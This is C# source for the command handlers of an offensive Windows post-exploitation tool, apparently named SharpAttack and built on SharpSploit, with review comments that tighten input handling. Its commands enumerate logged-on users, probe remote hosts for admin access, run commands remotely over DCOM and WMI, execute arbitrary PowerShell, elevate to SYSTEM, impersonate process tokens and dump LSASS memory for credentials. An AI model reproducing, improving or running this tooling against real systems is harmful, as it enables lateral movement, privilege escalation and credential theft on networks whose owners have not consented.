/// <summary>
/// Prints help text. With a "Command" argument, shows that command's help line and
/// one table row per parameter; without it, lists every entry in
/// SharpAttack.AvailableCommands.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    // No specific command requested: print the overview table and stop.
    if (!RunParams.TryGetValue("Command", out Parameter command))
    {
        Printing.TableHeader("SharpAttack Commands", "Here are the commands available to you", "Command", "Description");
        foreach (KeyValuePair<string, Command> entry in SharpAttack.AvailableCommands)
        {
            Printing.TableItem(entry.Key, entry.Value.Helptext);
        }
        return;
    }

    try
    {
        // The indexer lookup throws for an unknown name; the catch below turns any
        // failure in this block into the "No command found" message.
        Command selected = SharpAttack.AvailableCommands[command.Value[0]];
        Printing.TableHeader(command.Value[0], selected.Helptext, "Parameter", "Description");
        foreach (KeyValuePair<string, Parameter> option in selected.Parameters)
        {
            Printing.TableItem($"-{option.Key}", option.Value.HelpText);
        }
    }
    catch
    {
        Printing.Error($"No command found named: {command.Value[0]}");
    }
}
/// <summary>
/// For each target returned by Proccessing.GetTargets, queries the logged-on users
/// through Net.GetNetLoggedOnUsers and prints each distinct user name once.
/// Names ending in "$" are skipped.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    List<string> targets = Proccessing.GetTargets(RunParams);
    if (targets.Count <= 0)
    {
        return;
    }

    foreach (string target in targets)
    {
        // A null target entry is treated as the local machine.
        string computer = target ?? "localhost";
        try
        {
            List<string> alreadyPrinted = new List<string>();
            List<Net.LoggedOnUser> sessions = Net.GetNetLoggedOnUsers(computer);
            Printing.CmdOutputHeading($"Logged on users for {computer}");

            foreach (Net.LoggedOnUser session in sessions)
            {
                if (session.UserName.EndsWith("$"))
                {
                    continue;
                }
                if (alreadyPrinted.Contains(session.UserName))
                {
                    continue;
                }

                Printing.CmdOutputItem($"User {session.UserName} is logged in from {session.ComputerName}");
                alreadyPrinted.Add(session.UserName);
            }
        }
        catch
        {
            // Any failure for this host is reported and the loop moves on to the next one.
            Printing.Error($"Could not get logged on users for {computer}");
        }
    }
}
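/// <summary>
/// Scans the targets on port 445 with Network.PortScan and, for every host where the
/// port is open, tries to open a handle to the "Spooler" service via ServiceController.
/// A handle that opens is reported as admin access; any exception as no access.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    List<string> targets = Proccessing.GetTargets(RunParams);
    if (targets.Count <= 0)
    {
        Printing.Error("Need to specify a ComputerName or IPAddress");
        return;
    }

    // The meaning of the third PortScan argument is not visible from this method.
    SharpSploitResultList<Network.PortScanResult> scan = Network.PortScan(targets, 445, true);
    foreach (Network.PortScanResult scanResult in scan)
    {
        if (!scanResult.IsOpen)
        {
            Printing.Error($"Port {scanResult.Port} is not open on {scanResult.ComputerName}");
            continue;
        }

        // ServiceController is disposable; the original never released it, leaking one
        // instance per reachable host. The using block disposes it on every path.
        using (ServiceController serviceController = new ServiceController("Spooler", scanResult.ComputerName))
        {
            try
            {
                // NOTE(review): success here only shows that the Spooler service handle
                // could be opened on that host; it is used as a proxy for administrative
                // rights. Confirm that is the intended meaning of the message.
                serviceController.ServiceHandle.Close();
                Printing.Success($"Admin access to {scanResult.ComputerName}");
            }
            catch
            {
                Printing.Error($"No access to {scanResult.ComputerName}");
            }
        }
    }
}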
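/// <summary>
/// Runs each supplied "Command" value on the given "ComputerName" through
/// DCOM.DCOMExecute, using the DCOM method selected by "Method" (MMC20 when omitted).
/// The optional "Parameters" string is passed unchanged with every command.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    string arguments = null;
    if (RunParams.TryGetValue("Parameters", out Parameter parameters))
    {
        arguments = parameters.Value[0];
    }

    DCOM.DCOMMethod selectedMethod = DCOM.DCOMMethod.MMC20_Application;
    if (RunParams.TryGetValue("Method", out Parameter method))
    {
        string value = method.Value[0];
        switch (value)
        {
            case "MMC20":
                selectedMethod = DCOM.DCOMMethod.MMC20_Application;
                break;
            case "ShellWindow":
                selectedMethod = DCOM.DCOMMethod.ShellWindows;
                break;
            case "ShellBrowserWindow":
                selectedMethod = DCOM.DCOMMethod.ShellBrowserWindow;
                break;
            case "ExcelDDE":
                selectedMethod = DCOM.DCOMMethod.ExcelDDE;
                break;
            default:
                // Previously the error was printed and execution carried on with the
                // default method, so a mistyped name still ran the command remotely by
                // a method the operator did not choose. Stop instead.
                Printing.Error($"{value} is not a valid method");
                return;
        }
    }

    if (!RunParams.TryGetValue("ComputerName", out Parameter computer))
    {
        Printing.Error("No Computer Name specified.");
        return;
    }

    if (!RunParams.TryGetValue("Command", out Parameter command))
    {
        Printing.Error("No command specified");
        return;
    }

    foreach (string cmd in command.Value)
    {
        // The fourth argument is passed as null; its meaning is not visible here.
        DCOM.DCOMExecute(computer.Value, cmd, arguments, null, selectedMethod);
    }
}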
/// <summary>
/// Calls tokens.RevertToSelf() and reports whether it succeeded.
/// </summary>
/// <param name="RunParams">Parsed arguments; not read by this command.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    bool reverted = tokens.RevertToSelf();
    if (!reverted)
    {
        Printing.Error("Failed to revert to self. We're stuck forever.");
        return;
    }

    Printing.Success("Successfully reverted to self");
}
/// <summary>
/// Calls tokens.GetSystem() and prints a success or failure message based on its
/// boolean result.
/// </summary>
/// <param name="RunParams">Parsed arguments; not read by this command.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    bool becameSystem = tokens.GetSystem();
    if (becameSystem)
    {
        Printing.Success("Successfully became SYSTEM");
        return;
    }

    Printing.Error("Failed to get SYSTEM");
}
/// <summary>
/// Passes every "Command" value to Shell.PowerShellExecute and prints what it returns.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    if (!RunParams.TryGetValue("Command", out Parameter command))
    {
        Printing.Error("No command specified");
        return;
    }

    foreach (string cmd in command.Value)
    {
        // The command text is handed over as-is; nothing in this method validates it.
        string output = Shell.PowerShellExecute(cmd);
        Printing.CmdOutput(output);
    }
}
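/// <summary>
/// Writes a process dump with Host.CreateProcessDump. The process is chosen by "PID";
/// when no PID is given (or it is negative) the process named "lsass" is dumped.
/// "OutputPath" defaults to the current directory and "OutputName" to "output.bin".
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    int id = -1;
    string OutputPath = Host.GetCurrentDirectory();
    string OutputName = "output.bin";

    // int.Parse used to throw out of Run on a non-numeric PID. Reject it explicitly so a
    // typo neither crashes the command nor ends up dumping a different process.
    if (RunParams.TryGetValue("PID", out Parameter pid) && !int.TryParse(pid.Value[0], out id))
    {
        Printing.Error($"Invalid PID: {pid.Value[0]}");
        return;
    }

    if (RunParams.TryGetValue("OutputPath", out Parameter outpath))
    {
        OutputPath = outpath.Value[0];
    }

    if (RunParams.TryGetValue("OutputName", out Parameter outname))
    {
        OutputName = outname.Value[0];
    }

    // NOTE(review): a memory dump of the LSASS process contains credential material,
    // so the file written here should be treated as sensitive.
    try
    {
        if (id < 0)
        {
            // A negative id (including the -1 default) selects the process by name.
            Host.CreateProcessDump("lsass", OutputPath, OutputName);
        }
        else
        {
            Host.CreateProcessDump(id, OutputPath, OutputName);
        }

        Printing.Success($"Dump created at {OutputPath}\\{OutputName}");
    }
    catch
    {
        Printing.Error("Error creating process dump.");
    }
}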
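/// <summary>
/// Runs each supplied "Command" value on the given "ComputerName" through
/// WMI.WMIExecute.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    // The original returned silently when ComputerName was missing. Report it, using
    // the same message the DCOM command prints for the same condition.
    if (!RunParams.TryGetValue("ComputerName", out Parameter computer))
    {
        Printing.Error("No Computer Name specified.");
        return;
    }

    if (!RunParams.TryGetValue("Command", out Parameter command))
    {
        Printing.Error("No command specified");
        return;
    }

    foreach (string cmd in command.Value)
    {
        // The last two arguments are passed as null; their meaning is not visible here.
        WMI.WMIExecute(computer.Value, cmd, null, null);
    }
}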
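/// <summary>
/// Parses "PID" as an unsigned integer and calls Tokens.ImpersonateProcess with it,
/// printing a success or failure message based on the boolean result.
/// </summary>
/// <param name="RunParams">Parsed arguments keyed by parameter name.</param>
public override void Run(Dictionary<String, Parameter> RunParams)
{
    if (!RunParams.TryGetValue("PID", out Parameter pid))
    {
        Printing.Error("No PID specified");
        return;
    }

    // Convert.ToUInt32 threw FormatException/OverflowException out of Run on bad input.
    // Validate instead and report the problem.
    if (!UInt32.TryParse(pid.Value[0], out UInt32 id))
    {
        Printing.Error($"Invalid PID: {pid.Value[0]}");
        return;
    }

    // NOTE(review): a fresh Tokens instance is created here and never released; if
    // Tokens is disposable it should be disposed. Confirm against its declaration.
    Tokens tokens = new Tokens();
    if (tokens.ImpersonateProcess(id))
    {
        Printing.Success("Successfully impersonated process.");
    }
    else
    {
        Printing.Error("Failed to impersonate process");
    }
}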